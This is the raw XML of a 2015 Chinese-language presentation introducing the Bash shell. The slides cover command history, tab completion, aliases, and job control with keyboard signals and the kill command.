            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>指的是命令行式的</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>shell</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4071723"/>
        <a:ext cx="8229600" cy="1017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47440-D36A-4CA3-B28B-85A9CB8A378E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="8244408" cy="1555200"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="lt1"/>
        </a:solidFill>
        <a:ln w="1905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Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Bash Shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>的优点</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="8244408" cy="1555200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{03EC1CA3-4A51-41EA-8F7F-660924ECE996}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1571980"/>
          <a:ext cx="8244408" cy="237168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ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>命令记录 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(.bash_history)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="228600" lvl="1" indent="-228600" algn="l" defTabSz="1066800">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>命令自动补全 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(&lt;tab&gt;&lt;tab&gt;)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="228600" lvl="1" indent="-228600" algn="l" defTabSz="1066800">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>命令别名</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(alias ls=‘ls –la’)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="228600" lvl="1" indent="-228600" algn="l" defTabSz="1066800">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>作业控制</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(bg, fg, coproc, Ctrl+Z(SIGSTOP), Ctrl+C(SIGINT), Ctrl+\(SIGQUIT), kill)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1571980"/>
        <a:ext cx="8244408" cy="23716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t>2015/5/11</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t>2015/5/11</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2015/5/11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t>2015/5/11</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tark.liang@by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1800" y="1484784"/>
            <a:ext cx="3411488" cy="720080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Bash Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>简介</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779912" y="3717032"/>
            <a:ext cx="4419600" cy="2016224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
                <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
                <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>梁窠金</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
              <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
                <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Department: SW  RIL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
                <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Email:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
                <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>stark.liang@byd.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
              <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
              <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
                <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Date: 2015/04/16</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="DaunPenh" pitchFamily="2" charset="0"/>
              <a:cs typeface="DaunPenh" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="970942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Funny Bash – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作业控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符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altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ctrl + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>当前在前台运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的任务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>信号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>任务没有忽略此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>信号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>，就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>将此任务终止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ctrl + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>当前在前台运行的任务发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGSTOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>信号，将这个任务停止并转入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>后台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ctrl + \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>给当前任务发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGQUIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的信号，如果任务不忽略此信号就终止此任务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kill (kill –s SIGKILL [PID |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JOB_SPEC])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>给指定进程或任务发送信号，默认发送的信号为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGTERM(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>终止信号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>如果不忽略此信号，就终止进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\LKJ2063591\AppData\Roaming\feiq\RichOle\1481624165.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340768"/>
            <a:ext cx="5342012" cy="2088232"/>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786648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Funny Bash – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>终端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GUI</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5142642"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
